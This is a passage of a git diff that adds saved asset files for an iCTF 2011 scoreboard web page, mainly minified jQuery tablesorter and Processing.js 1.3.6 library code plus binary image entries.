pos=n[i][checkCell];rows.push(r[pos]);if(!table.config.appender){var l=r[pos].length;for(var j=0;j<l;j++){tableBody[0].appendChild(r[pos][j]);}}}if(table.config.appender){table.config.appender(table,rows);}rows=null;if(table.config.debug){benchmark("Rebuilt table:",appendTime);}applyWidget(table);setTimeout(function(){$(table).trigger("sortEnd");},0);};function buildHeaders(table){if(table.config.debug){var time=new Date();}var meta=($.metadata)?true:false;var header_index=computeTableHeaderCellIndexes(table);$tableHeaders=$(table.config.selectorHeaders,table).each(function(index){this.column=header_index[this.parentNode.rowIndex+"-"+this.cellIndex];this.order=formatSortingOrder(table.config.sortInitialOrder);this.count=this.order;if(checkHeaderMetadata(this)||checkHeaderOptions(table,index))this.sortDisabled=true;if(checkHeaderOptionsSortingLocked(table,index))this.order=this.lockedOrder=checkHeaderOptionsSortingLocked(table,index);if(!this.sortDisabled){var $th=$(this).addClass(table.config.cssHeader);if(table.config.onRenderHeader)table.config.onRenderHeader.apply($th);}table.config.headerList[index]=this;});if(table.config.debug){benchmark("Built headers:",time);log($tableHeaders);}return $tableHeaders;};function computeTableHeaderCellIndexes(t){var matrix=[];var lookup={};var thead=t.getElementsByTagName('THEAD')[0];var trs=thead.getElementsByTagName('TR');for(var i=0;i<trs.length;i++){var cells=trs[i].cells;for(var j=0;j<cells.length;j++){var c=cells[j];var rowIndex=c.parentNode.rowIndex;var cellId=rowIndex+"-"+c.cellIndex;var rowSpan=c.rowSpan||1;var colSpan=c.colSpan||1 +var firstAvailCol;if(typeof(matrix[rowIndex])=="undefined"){matrix[rowIndex]=[];}for(var k=0;k<matrix[rowIndex].length+1;k++){if(typeof(matrix[rowIndex][k])=="undefined"){firstAvailCol=k;break;}}lookup[cellId]=firstAvailCol;for(var k=rowIndex;k<rowIndex+rowSpan;k++){if(typeof(matrix[k])=="undefined"){matrix[k]=[];}var matrixrow=matrix[k];for(var l=firstAvailCol;l<firstAvailCol+colSpan;l++){matrixrow[l]="x";}}}}return lookup;}function checkCellColSpan(table,rows,row){var arr=[],r=table.tHead.rows,c=r[row].cells;for(var i=0;i<c.length;i++){var cell=c[i];if(cell.colSpan>1){arr=arr.concat(checkCellColSpan(table,headerArr,row++));}else{if(table.tHead.length==1||(cell.rowSpan>1||!r[row+1])){arr.push(cell);}}}return arr;};function checkHeaderMetadata(cell){if(($.metadata)&&($(cell).metadata().sorter===false)){return true;};return false;}function checkHeaderOptions(table,i){if((table.config.headers[i])&&(table.config.headers[i].sorter===false)){return true;};return false;}function checkHeaderOptionsSortingLocked(table,i){if((table.config.headers[i])&&(table.config.headers[i].lockedOrder))return table.config.headers[i].lockedOrder;return false;}function applyWidget(table){var c=table.config.widgets;var l=c.length;for(var i=0;i<l;i++){getWidgetById(c[i]).format(table);}}function getWidgetById(name){var l=widgets.length;for(var i=0;i<l;i++){if(widgets[i].id.toLowerCase()==name.toLowerCase()){return widgets[i];}}};function formatSortingOrder(v){if(typeof(v)!="Number"){return(v.toLowerCase()=="desc")?1:0;}else{return(v==1)?1:0;}}function isValueInArray(v,a){var l=a.length;for(var i=0;i<l;i++){if(a[i][0]==v){return true;}}return false;}function setHeadersCss(table,$headers,list,css){$headers.removeClass(css[0]).removeClass(css[1]);var h=[];$headers.each(function(offset){if(!this.sortDisabled){h[this.column]=$(this);}});var l=list.length;for(var i=0;i<l;i++){h[list[i][0]].addClass(css[list[i][1]]);}}function fixColumnWidth(table,$headers){var c=table.config;if(c.widthFixed){var colgroup=$('<colgroup>');$("tr:first td",table.tBodies[0]).each(function(){colgroup.append($('<col>').css('width',$(this).width()));});$(table).prepend(colgroup);};}function updateHeaderSortCount(table,sortList){var c=table.config,l=sortList.length;for(var i=0;i<l;i++){var s=sortList[i],o=c.headerList[s[0]];o.count=s[1];o.count++;}}function multisort(table,sortList,cache){if(table.config.debug){var sortTime=new Date();}var dynamicExp="var sortWrapper = function(a,b) {",l=sortList.length;for(var i=0;i<l;i++){var c=sortList[i][0];var order=sortList[i][1];var s=(table.config.parsers[c].type=="text")?((order==0)?makeSortFunction("text","asc",c):makeSortFunction("text","desc",c)):((order==0)?makeSortFunction("numeric","asc",c):makeSortFunction("numeric","desc",c));var e="e"+i;dynamicExp+="var "+e+" = "+s;dynamicExp+="if("+e+") { return "+e+"; } ";dynamicExp+="else { ";}var orgOrderCol=cache.normalized[0].length-1;dynamicExp+="return a["+orgOrderCol+"]-b["+orgOrderCol+"];";for(var i=0;i<l;i++){dynamicExp+="}; ";}dynamicExp+="return 0; ";dynamicExp+="}; ";if(table.config.debug){benchmark("Evaling expression:"+dynamicExp,new Date());}eval(dynamicExp);cache.normalized.sort(sortWrapper);if(table.config.debug){benchmark("Sorting on "+sortList.toString()+" and dir "+order+" time:",sortTime);}return cache;};function makeSortFunction(type,direction,index){var a="a["+index+"]",b="b["+index+"]";if(type=='text'&&direction=='asc'){return"("+a+" == "+b+" ? 0 : ("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : ("+a+" < "+b+") ? -1 : 1 )));";}else if(type=='text'&&direction=='desc'){return"("+a+" == "+b+" ? 0 : ("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : ("+b+" < "+a+") ? -1 : 1 )));";}else if(type=='numeric'&&direction=='asc'){return"("+a+" === null && "+b+" === null) ? 0 :("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : "+a+" - "+b+"));";}else if(type=='numeric'&&direction=='desc'){return"("+a+" === null && "+b+" === null) ? 0 :("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : "+b+" - "+a+"));";}};function makeSortText(i){return"((a["+i+"] < b["+i+"]) ? -1 : ((a["+i+"] > b["+i+"]) ? 1 : 0));";};function makeSortTextDesc(i){return"((b["+i+"] < a["+i+"]) ? -1 : ((b["+i+"] > a["+i+"]) ? 1 : 0));";};function makeSortNumeric(i){return"a["+i+"]-b["+i+"];";};function makeSortNumericDesc(i){return"b["+i+"]-a["+i+"];";};function sortText(a,b){if(table.config.sortLocaleCompare)return a.localeCompare(b);return((a<b)?-1:((a>b)?1:0));};function sortTextDesc(a,b){if(table.config.sortLocaleCompare)return b.localeCompare(a);return((b<a)?-1:((b>a)?1:0));};function sortNumeric(a,b){return a-b;};function sortNumericDesc(a,b){return b-a;};function getCachedSortType(parsers,i){return parsers[i].type;};this.construct=function(settings){return this.each(function(){if(!this.tHead||!this.tBodies)return;var $this,$document,$headers,cache,config,shiftDown=0,sortOrder;this.config={};config=$.extend(this.config,$.tablesorter.defaults,settings);$this=$(this);$.data(this,"tablesorter",config);$headers=buildHeaders(this);this.config.parsers=buildParserCache(this,$headers);cache=buildCache(this);var sortCSS=[config.cssDesc,config.cssAsc];fixColumnWidth(this);$headers.click(function(e){var totalRows=($this[0].tBodies[0]&&$this[0].tBodies[0].rows.length)||0;if(!this.sortDisabled&&totalRows>0){$this.trigger("sortStart");var $cell=$(this);var i=this.column;this.order=this.count++%2;if(this.lockedOrder)this.order=this.lockedOrder;if(!e[config.sortMultiSortKey]){config.sortList=[];if(config.sortForce!=null){var a=config.sortForce;for(var j=0;j<a.length;j++){if(a[j][0]!=i){config.sortList.push(a[j]);}}}config.sortList.push([i,this.order]);}else{if(isValueInArray(i,config.sortList)){for(var j=0;j<config.sortList.length;j++){var s=config.sortList[j],o=config.headerList[s[0]];if(s[0]==i){o.count=s[1];o.count++;s[1]=o.count%2;}}}else{config.sortList.push([i,this.order]);}};setTimeout(function(){setHeadersCss($this[0],$headers,config.sortList,sortCSS);appendToTable($this[0],multisort($this[0],config.sortList,cache));},1);return false;}}).mousedown(function(){if(config.cancelSelection){this.onselectstart=function(){return false};return false;}});$this.bind("update",function(){var me=this;setTimeout(function(){me.config.parsers=buildParserCache(me,$headers);cache=buildCache(me);},1);}).bind("updateCell",function(e,cell){var config=this.config;var pos=[(cell.parentNode.rowIndex-1),cell.cellIndex];cache.normalized[pos[0]][pos[1]]=config.parsers[pos[1]].format(getElementText(config,cell),cell);}).bind("sorton",function(e,list){$(this).trigger("sortStart");config.sortList=list;var sortList=config.sortList;updateHeaderSortCount(this,sortList);setHeadersCss(this,$headers,sortList,sortCSS);appendToTable(this,multisort(this,sortList,cache));}).bind("appendCache",function(){appendToTable(this,cache);}).bind("applyWidgetId",function(e,id){getWidgetById(id).format(this);}).bind("applyWidgets",function(){applyWidget(this);});if($.metadata&&($(this).metadata()&&$(this).metadata().sortlist)){config.sortList=$(this).metadata().sortlist;}if(config.sortList.length>0){$this.trigger("sorton",[config.sortList]);}applyWidget(this);});};this.addParser=function(parser){var l=parsers.length,a=true;for(var i=0;i<l;i++){if(parsers[i].id.toLowerCase()==parser.id.toLowerCase()){a=false;}}if(a){parsers.push(parser);};};this.addWidget=function(widget){widgets.push(widget);};this.formatFloat=function(s){var i=parseFloat(s);return(isNaN(i))?0:i;};this.formatInt=function(s){var i=parseInt(s);return(isNaN(i))?0:i;};this.isDigit=function(s,config){return/^[-+]?\d*$/.test($.trim(s.replace(/[,.']/g,'')));};this.clearTableBody=function(table){if($.browser.msie){function empty(){while(this.firstChild)this.removeChild(this.firstChild);}empty.apply(table.tBodies[0]);}else{table.tBodies[0].innerHTML="";}};}});$.fn.extend({tablesorter:$.tablesorter.construct});var ts=$.tablesorter;ts.addParser({id:"text",is:function(s){return true;},format:function(s){return $.trim(s.toLocaleLowerCase());},type:"text"});ts.addParser({id:"digit",is:function(s,table){var c=table.config;return $.tablesorter.isDigit(s,c);},format:function(s){return $.tablesorter.formatFloat(s);},type:"numeric"});ts.addParser({id:"currency",is:function(s){return/^[£$€?.]/.test(s);},format:function(s){return $.tablesorter.formatFloat(s.replace(new RegExp(/[£$€]/g),""));},type:"numeric"});ts.addParser({id:"ipAddress",is:function(s){return/^\d{2,3}[\.]\d{2,3}[\.]\d{2,3}[\.]\d{2,3}$/.test(s);},format:function(s){var a=s.split("."),r="",l=a.length;for(var i=0;i<l;i++){var item=a[i];if(item.length==2){r+="0"+item;}else{r+=item;}}return $.tablesorter.formatFloat(r);},type:"numeric"});ts.addParser({id:"url",is:function(s){return/^(https?|ftp|file):\/\/$/.test(s);},format:function(s){return jQuery.trim(s.replace(new RegExp(/(https?|ftp|file):\/\//),''));},type:"text"});ts.addParser({id:"isoDate",is:function(s){return/^\d{4}[\/-]\d{1,2}[\/-]\d{1,2}$/.test(s);},format:function(s){return $.tablesorter.formatFloat((s!="")?new Date(s.replace(new RegExp(/-/g),"/")).getTime():"0");},type:"numeric"});ts.addParser({id:"percent",is:function(s){return/\%$/.test($.trim(s));},format:function(s){return $.tablesorter.formatFloat(s.replace(new RegExp(/%/g),""));},type:"numeric"});ts.addParser({id:"usLongDate",is:function(s){return s.match(new RegExp(/^[A-Za-z]{3,10}\.? [0-9]{1,2}, ([0-9]{4}|'?[0-9]{2}) (([0-2]?[0-9]:[0-5][0-9])|([0-1]?[0-9]:[0-5][0-9]\s(AM|PM)))$/));},format:function(s){return $.tablesorter.formatFloat(new Date(s).getTime());},type:"numeric"});ts.addParser({id:"shortDate",is:function(s){return/\d{1,2}[\/\-]\d{1,2}[\/\-]\d{2,4}/.test(s);},format:function(s,table){var c=table.config;s=s.replace(/\-/g,"/");if(c.dateFormat=="us"){s=s.replace(/(\d{1,2})[\/\-](\d{1,2})[\/\-](\d{4})/,"$3/$1/$2");}else if(c.dateFormat=="uk"){s=s.replace(/(\d{1,2})[\/\-](\d{1,2})[\/\-](\d{4})/,"$3/$2/$1");}else if(c.dateFormat=="dd/mm/yy"||c.dateFormat=="dd-mm-yy"){s=s.replace(/(\d{1,2})[\/\-](\d{1,2})[\/\-](\d{2})/,"$1/$2/$3");}return $.tablesorter.formatFloat(new Date(s).getTime());},type:"numeric"});ts.addParser({id:"time",is:function(s){return/^(([0-2]?[0-9]:[0-5][0-9])|([0-1]?[0-9]:[0-5][0-9]\s(am|pm)))$/.test(s);},format:function(s){return $.tablesorter.formatFloat(new Date("2000/01/01 "+s).getTime());},type:"numeric"});ts.addParser({id:"metadata",is:function(s){return false;},format:function(s,table,cell){var c=table.config,p=(!c.parserMetadataName)?'sortValue':c.parserMetadataName;return $(cell).metadata()[p];},type:"numeric"});ts.addWidget({id:"zebra",format:function(table){if(table.config.debug){var time=new Date();}var $tr,row=-1,odd;$("tr:visible",table.tBodies[0]).each(function(i){$tr=$(this);if(!$tr.hasClass(table.config.cssChildRow))row++;odd=(row%2==0);$tr.removeClass(table.config.widgetZebra.css[odd?0:1]).addClass(table.config.widgetZebra.css[odd?1:0])});if(table.config.debug){$.tablesorter.benchmark("Applying Zebra widget",time);}}});})(jQuery); +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/locked.png b/ictf2011/scoreboard.ictf2011_end.info_files/locked.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/my.png b/ictf2011/scoreboard.ictf2011_end.info_files/my.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/nl.png b/ictf2011/scoreboard.ictf2011_end.info_files/nl.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/off.gif b/ictf2011/scoreboard.ictf2011_end.info_files/off.gif Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/on.gif b/ictf2011/scoreboard.ictf2011_end.info_files/on.gif Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/processing-1.3.6.min.js b/ictf2011/scoreboard.ictf2011_end.info_files/processing-1.3.6.min.js @@ -0,0 +1,13 @@ +/*** + + P R O C E S S I N G . J S - 1.3.6 + a port of the Processing visualization language + + Processing.js is licensed under the MIT License, see LICENSE. + For a list of copyright holders, please refer to AUTHORS. + + http://processingjs.org + +***/ + +(function(B,d,o,r){var E=function(){};var q=function(){if("console" in B){return function(L){B.console.log("Processing.js: "+L)}}return E()}();var u=function(L){var M=new XMLHttpRequest;M.open("GET",L,false);if(M.overrideMimeType){M.overrideMimeType("text/plain")}M.setRequestHeader("If-Modified-Since","Fri, 01 Jan 1960 00:00:00 GMT");M.send(null);if(M.status!==200&&M.status!==0){throw"XMLHttpRequest failed, status code "+M.status}return M.responseText};var l="document" in this&&!("fake" in this.document);d.head=d.head||d.getElementsByTagName("head")[0];function A(L,M){if(L in B){return B[L]}if(typeof B[M]==="function"){return B[M]}return function(O){if(O instanceof Array){return O}if(typeof O==="number"){var N=[];N.length=O;return N}}}var e=A("Float32Array","WebGLFloatArray"),I=A("Int32Array","WebGLIntArray"),w=A("Uint16Array","WebGLUnsignedShortArray"),b=A("Uint8Array","WebGLUnsignedByteArray");var z={X:0,Y:1,Z:2,R:3,G:4,B:5,A:6,U:7,V:8,NX:9,NY:10,NZ:11,EDGE:12,SR:13,SG:14,SB:15,SA:16,SW:17,TX:18,TY:19,TZ:20,VX:21,VY:22,VZ:23,VW:24,AR:25,AG:26,AB:27,DR:3,DG:4,DB:5,DA:6,SPR:28,SPG:29,SPB:30,SHINE:31,ER:32,EG:33,EB:34,BEEN_LIT:35,VERTEX_FIELD_COUNT:36,P2D:1,JAVA2D:1,WEBGL:2,P3D:2,OPENGL:2,PDF:0,DXF:0,OTHER:0,WINDOWS:1,MAXOSX:2,LINUX:3,EPSILON:0.0001,MAX_FLOAT:3.4028235e+38,MIN_FLOAT:-3.4028235e+38,MAX_INT:2147483647,MIN_INT:-2147483648,PI:o.PI,TWO_PI:2*o.PI,HALF_PI:o.PI/2,THIRD_PI:o.PI/3,QUARTER_PI:o.PI/4,DEG_TO_RAD:o.PI/180,RAD_TO_DEG:180/o.PI,WHITESPACE:" \t\n\r\u000c\u00a0",RGB:1,ARGB:2,HSB:3,ALPHA:4,CMYK:5,TIFF:0,TARGA:1,JPEG:2,GIF:3,BLUR:11,GRAY:12,INVERT:13,OPAQUE:14,POSTERIZE:15,THRESHOLD:16,ERODE:17,DILATE:18,REPLACE:0,BLEND:1<<0,ADD:1<<1,SUBTRACT:1<<2,LIGHTEST:1<<3,DARKEST:1<<4,DIFFERENCE:1<<5,EXCLUSION:1<<6,MULTIPLY:1<<7,SCREEN:1<<8,OVERLAY:1<<9,HARD_LIGHT:1<<10,SOFT_LIGHT:1<<11,DODGE:1<<12,BURN:1<<13,ALPHA_MASK:4278190080,RED_MASK:16711680,GREEN_MASK:65280,BLUE_MASK:255,CUSTOM:0,ORTHOGRAPHIC:2,PERSPECTIVE:3,POINT:2,POINTS:2,LINE:4,LINES:4,TRIANGLE:8,TRIANGLES:9,TRIANGLE_STRIP:10,TRIANGLE_FAN:11,QUAD:16,QUADS:16,QUAD_STRIP:17,POLYGON:20,PATH:21,RECT:30,ELLIPSE:31,ARC:32,SPHERE:40,BOX:41,GROUP:0,PRIMITIVE:1,GEOMETRY:3,VERTEX:0,BEZIER_VERTEX:1,CURVE_VERTEX:2,BREAK:3,CLOSESHAPE:4,OPEN:1,CLOSE:2,CORNER:0,CORNERS:1,RADIUS:2,CENTER_RADIUS:2,CENTER:3,DIAMETER:3,CENTER_DIAMETER:3,BASELINE:0,TOP:101,BOTTOM:102,NORMAL:1,NORMALIZED:1,IMAGE:2,MODEL:4,SHAPE:5,SQUARE:"butt",ROUND:"round",PROJECT:"square",MITER:"miter",BEVEL:"bevel",AMBIENT:0,DIRECTIONAL:1,SPOT:3,BACKSPACE:8,TAB:9,ENTER:10,RETURN:13,ESC:27,DELETE:127,CODED:65535,SHIFT:16,CONTROL:17,ALT:18,CAPSLK:20,PGUP:33,PGDN:34,END:35,HOME:36,LEFT:37,UP:38,RIGHT:39,DOWN:40,F1:112,F2:113,F3:114,F4:115,F5:116,F6:117,F7:118,F8:119,F9:120,F10:121,F11:122,F12:123,NUMLK:144,META:157,INSERT:155,ARROW:"default",CROSS:"crosshair",HAND:"pointer",MOVE:"move",TEXT:"text",WAIT:"wait",NOCURSOR:"url('data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='), auto",DISABLE_OPENGL_2X_SMOOTH:1,ENABLE_OPENGL_2X_SMOOTH:-1,ENABLE_OPENGL_4X_SMOOTH:2,ENABLE_NATIVE_FONTS:3,DISABLE_DEPTH_TEST:4,ENABLE_DEPTH_TEST:-4,ENABLE_DEPTH_SORT:5,DISABLE_DEPTH_SORT:-5,DISABLE_OPENGL_ERROR_REPORT:6,ENABLE_OPENGL_ERROR_REPORT:-6,ENABLE_ACCURATE_TEXTURES:7,DISABLE_ACCURATE_TEXTURES:-7,HINT_COUNT:10,SINCOS_LENGTH:720,PRECISIONB:15,PRECISIONF:1<<15,PREC_MAXVAL:(1<<15)-1,PREC_ALPHA_SHIFT:24-15,PREC_RED_SHIFT:16-15,NORMAL_MODE_AUTO:0,NORMAL_MODE_SHAPE:1,NORMAL_MODE_VERTEX:2,MAX_LIGHTS:8};function h(N){if(typeof N==="string"){var M=0;for(var L=0;L<N.length;++L){M=M*31+N.charCodeAt(L)&4294967295}return M}if(typeof N!=="object"){return N&4294967295}if(N.hashCode instanceof Function){return N.hashCode()}if(N.$id===r){N.$id=o.floor(o.random()*65536)-32768<<16|o.floor(o.random()*65536)}return N.$id}function p(M,L){if(M===null||L===null){return M===null&&L===null}if(typeof M==="string"){return M===L}if(typeof M!=="object"){return M===L}if(M.equals instanceof Function){return M.equals(L)}return M===L}var m=function(M){if(M.iterator instanceof Function){return M.iterator()}if(M instanceof Array){var L=-1;this.hasNext=function(){return ++L<M.length};this.next=function(){return M[L]}}else{throw"Unable to iterate: "+M}};var f=function(){function M(O){var N=0;this.hasNext=function(){return N<O.length};this.next=function(){return O[N++]};this.remove=function(){O.splice(N,1)}}function L(){var N;if(arguments.length===0){N=[]}else{if(arguments.length>0&&typeof arguments[0]!=="number"){N=arguments[0].toArray()}else{N=[];N.length=0|arguments[0]}}this.get=function(O){return N[O]};this.contains=function(O){return this.indexOf(O)>-1};this.indexOf=function(Q){for(var P=0,O=N.length;P<O;++P){if(p(Q,N[P])){return P}}return -1};this.add=function(){if(arguments.length===1){N.push(arguments[0])}else{if(arguments.length===2){var O=arguments[0];if(typeof O==="number"){if(O>=0&&O<=N.length){N.splice(O,0,arguments[1])}else{throw O+" is not a valid index"}}else{throw typeof O+" is not a number"}}else{throw"Please use the proper number of parameters."}}};this.addAll=function(P,O){var Q;if(typeof P==="number"){if(P<0||P>N.length){throw"Index out of bounds for addAll: "+P+" greater or equal than "+N.length}Q=new m(O);while(Q.hasNext()){N.splice(P++,0,Q.next())}}else{Q=new m(P);while(Q.hasNext()){N.push(Q.next())}}};this.set=function(){if(arguments.length===2){var O=arguments[0];if(typeof O==="number"){if(O>=0&&O<N.length){N.splice(O,1,arguments[1])}else{throw O+" is not a valid index."}}else{throw typeof O+" is not a number"}}else{throw"Please use the proper number of parameters."}};this.size=function(){return N.length};this.clear=function(){N.length=0};this.remove=function(O){if(typeof O==="number"){return N.splice(O,1)[0]}O=this.indexOf(O);if(O>-1){N.splice(O,1);return true}return false};this.isEmpty=function(){return !N.length};this.clone=function(){return new L(this)};this.toArray=function(){return N.slice(0)};this.iterator=function(){return new M(N)}}return L}();var v=function(){function L(){if(arguments.length===1&&arguments[0] instanceof L){return arguments[0].clone()}var U=arguments.length>0?arguments[0]:16;var V=arguments.length>1?arguments[1]:0.75;var O=[];O.length=U;var Q=0;var M=this;function S(X){var W=h(X)%O.length;return W<0?O.length+W:W}function P(){if(Q<=V*O.length){return}var Z=[];for(var Y=0;Y<O.length;++Y){if(O[Y]!==r){Z=Z.concat(O[Y])}}var aa=O.length*2;O=[];O.length=aa;for(var X=0;X<Z.length;++X){var W=S(Z[X].key);var ab=O[W];if(ab===r){O[W]=ab=[]}ab.push(Z[X])}}function N(aa,ab){var W=0;var Z=-1;var Y=false;function X(){while(!Y){++Z;if(W>=O.length){Y=true}else{if(O[W]===r||Z>=O[W].length){Z=-1;++W}else{return}}}}this.hasNext=function(){return !Y};this.next=function(){var ac=aa(O[W][Z]);X();return ac};this.remove=function(){ab(this.next());--Z};X()}function T(W,X,Y){this.clear=function(){M.clear()};this.contains=function(Z){return X(Z)};this.containsAll=function(aa){var Z=aa.iterator();while(Z.hasNext()){if(!this.contains(Z.next())){return false}}return true};this.isEmpty=function(){return M.isEmpty()};this.iterator=function(){return new N(W,Y)};this.remove=function(Z){if(this.contains(Z)){Y(Z);return true}return false};this.removeAll=function(ac){var Z=ac.iterator();var ab=false;while(Z.hasNext()){var aa=Z.next();if(this.contains(aa)){Y(aa);ab=true}}return true};this.retainAll=function(ad){var ab=this.iterator();var aa=[];while(ab.hasNext()){var ac=ab.next();if(!ad.contains(ac)){aa.push(ac)}}for(var Z=0;Z<aa.length;++Z){Y(aa[Z])}return aa.length>0};this.size=function(){return M.size()};this.toArray=function(){var Z=[];var aa=this.iterator();while(aa.hasNext()){Z.push(aa.next())}return Z}}function R(W){this._isIn=function(X){return X===M&&W.removed===r};this.equals=function(X){return p(W.key,X.getKey())};this.getKey=function(){return W.key};this.getValue=function(){return W.value};this.hashCode=function(X){return h(W.key)};this.setValue=function(Y){var X=W.value;W.value=Y;return X}}this.clear=function(){Q=0;O=[];O.length=U};this.clone=function(){var W=new L;W.putAll(this);return W};this.containsKey=function(Y){var W=S(Y);var Z=O[W];if(Z===r){return false}for(var X=0;X<Z.length;++X){if(p(Z[X].key,Y)){return true}}return false};this.containsValue=function(Y){for(var X=0;X<O.length;++X){var Z=O[X];if(Z===r){continue}for(var W=0;W<Z.length;++W){if(p(Z[W].value,Y)){return true}}}return false};this.entrySet=function(){return new T(function(W){return new R(W)},function(W){return W instanceof R&&W._isIn(M)},function(W){return M.remove(W.getKey())})};this.get=function(Y){var W=S(Y);var Z=O[W];if(Z===r){return null}for(var X=0;X<Z.length;++X){if(p(Z[X].key,Y)){return Z[X].value}}return null};this.isEmpty=function(){return Q===0};this.keySet=function(){return new T(function(W){return W.key},function(W){return M.containsKey(W)},function(W){return M.remove(W)})};this.values=function(){return new T(function(W){return W.value},function(W){return M.containsValue(W)},function(W){return M.removeByValue(W)})};this.put=function(Y,aa){var W=S(Y);var ab=O[W];if(ab===r){++Q;O[W]=[{key:Y,value:aa}];P();return null}for(var X=0;X<ab.length;++X){if(p(ab[X].key,Y)){var Z=ab[X].value;ab[X].value=aa;return Z}}++Q;ab.push({key:Y,value:aa});P();return null};this.putAll=function(W){var X=W.entrySet().iterator();while(X.hasNext()){var Y=X.next();this.put(Y.getKey(),Y.getValue())}};this.remove=function(Y){var W=S(Y);var aa=O[W];if(aa===r){return null}for(var X=0;X<aa.length;++X){if(p(aa[X].key,Y)){--Q;var Z=aa[X].value;aa[X].removed=true;if(aa.length>1){aa.splice(X,1)}else{O[W]=r}return Z}}return null};this.removeByValue=function(Y){var aa,X,W,Z;for(aa in O){if(O.hasOwnProperty(aa)){for(X=0,W=O[aa].length;X<W;X++){Z=O[aa][X];if(Z.value===Y){O[aa].splice(X,1);return true}}}}return false};this.size=function(){return Q}}return L}();var y=function(){function L(O,Q,P){this.x=O||0;this.y=Q||0;this.z=P||0}L.dist=function(P,O){return P.dist(O)};L.dot=function(P,O){return P.dot(O)};L.cross=function(P,O){return P.cross(O)};L.angleBetween=function(P,O){return o.acos(P.dot(O)/(P.mag()*O.mag()))};L.prototype={set:function(O,Q,P){if(arguments.length===1){this.set(O.x||O[0]||0,O.y||O[1]||0,O.z||O[2]||0)}else{this.x=O;this.y=Q;this.z=P}},get:function(){return new L(this.x,this.y,this.z)},mag:function(){var O=this.x,Q=this.y,P=this.z;return o.sqrt(O*O+Q*Q+P*P)},add:function(O,Q,P){if(arguments.length===1){this.x+=O.x;this.y+=O.y;this.z+=O.z}else{this.x+=O;this.y+=Q;this.z+=P}},sub:function(O,Q,P){if(arguments.length===1){this.x-=O.x;this.y-=O.y;this.z-=O.z}else{this.x-=O;this.y-=Q;this.z-=P}},mult:function(O){if(typeof O==="number"){this.x*=O;this.y*=O;this.z*=O}else{this.x*=O.x;this.y*=O.y;this.z*=O.z}},div:function(O){if(typeof O==="number"){this.x/=O;this.y/=O;this.z/=O}else{this.x/=O.x;this.y/=O.y;this.z/=O.z}},dist:function(R){var Q=this.x-R.x,P=this.y-R.y,O=this.z-R.z;return o.sqrt(Q*Q+P*P+O*O)},dot:function(O,Q,P){if(arguments.length===1){return this.x*O.x+this.y*O.y+this.z*O.z}return this.x*O+this.y*Q+this.z*P},cross:function(P){var O=this.x,R=this.y,Q=this.z;return new L(R*P.z-P.y*Q,Q*P.x-P.z*O,O*P.y-P.x*R)},normalize:function(){var O=this.mag();if(O>0){this.div(O)}},limit:function(O){if(this.mag()>O){this.normalize();this.mult(O)}},heading2D:function(){return -o.atan2(-this.y,this.x)},toString:function(){return"["+this.x+", "+this.y+", "+this.z+"]"},array:function(){return[this.x,this.y,this.z]}};function M(O){return function(R,Q){var P=R.get();P[O](Q);return P}}for(var N in L.prototype){if(L.prototype.hasOwnProperty(N)&&!L.hasOwnProperty(N)){L[N]=M(N)}}return L}();function K(){}K.prototype=z;var g=new K;g.ArrayList=f;g.HashMap=v;g.PVector=y;g.ObjectIterator=m;g.PConstants=z;g.defineProperty=function(M,L,N){if("defineProperty" in Object){Object.defineProperty(M,L,N)}else{if(N.hasOwnProperty("get")){M.__defineGetter__(L,N.get)}if(N.hasOwnProperty("set")){M.__defineSetter__(L,N.set)}}};function i(O,N){function P(Q){g.defineProperty(O,Q,{get:function(){return N[Q]},set:function(R){N[Q]=R},enumerable:true})}var M=[];for(var L in N){if(typeof N[L]==="function"){if(!O.hasOwnProperty(L)){O[L]=N[L]}}else{if(L.charAt(0)!=="$"&&!(L in O)){M.push(L)}}}while(M.length>0){P(M.shift())}}g.extendClassChain=function(M){var N=[M];for(var L=M.$upcast;L;L=L.$upcast){i(L,M);N.push(L);M=L}while(N.length>0){N.pop().$self=M}};g.extendStaticMembers=function(L,M){i(L,M)};g.extendInterfaceMembers=function(L,M){i(L,M)};g.addMethod=function(O,N,Q,P){if(O[N]){var M=Q.length,L=O[N];O[N]=function(){if(arguments.length===M){return Q.apply(this,arguments)}return L.apply(this,arguments)}}else{O[N]=Q}};g.createJavaArray=function(P,Q){var M=null;if(typeof Q[0]==="number"){var L=0|Q[0];if(Q.length<=1){M=[];M.length=L;for(var O=0;O<L;++O){M[O]=0}}else{M=[];var R=Q.slice(1);for(var N=0;N<L;++N){M.push(g.createJavaArray(P,R))}}}return M};var C={aliceblue:"#f0f8ff",antiquewhite:"#faebd7",aqua:"#00ffff",aquamarine:"#7fffd4",azure:"#f0ffff",beige:"#f5f5dc",bisque:"#ffe4c4",black:"#000000",blanchedalmond:"#ffebcd",blue:"#0000ff",blueviolet:"#8a2be2",brown:"#a52a2a",burlywood:"#deb887",cadetblue:"#5f9ea0",chartreuse:"#7fff00",chocolate:"#d2691e",coral:"#ff7f50",cornflowerblue:"#6495ed",cornsilk:"#fff8dc",crimson:"#dc143c",cyan:"#00ffff",darkblue:"#00008b",darkcyan:"#008b8b",darkgoldenrod:"#b8860b",darkgray:"#a9a9a9",darkgreen:"#006400",darkkhaki:"#bdb76b",darkmagenta:"#8b008b",darkolivegreen:"#556b2f",darkorange:"#ff8c00",darkorchid:"#9932cc",darkred:"#8b0000",darksalmon:"#e9967a",darkseagreen:"#8fbc8f",darkslateblue:"#483d8b",darkslategray:"#2f4f4f",darkturquoise:"#00ced1",darkviolet:"#9400d3",deeppink:"#ff1493",deepskyblue:"#00bfff",dimgray:"#696969",dodgerblue:"#1e90ff",firebrick:"#b22222",floralwhite:"#fffaf0",forestgreen:"#228b22",fuchsia:"#ff00ff",gainsboro:"#dcdcdc",ghostwhite:"#f8f8ff",gold:"#ffd700",goldenrod:"#daa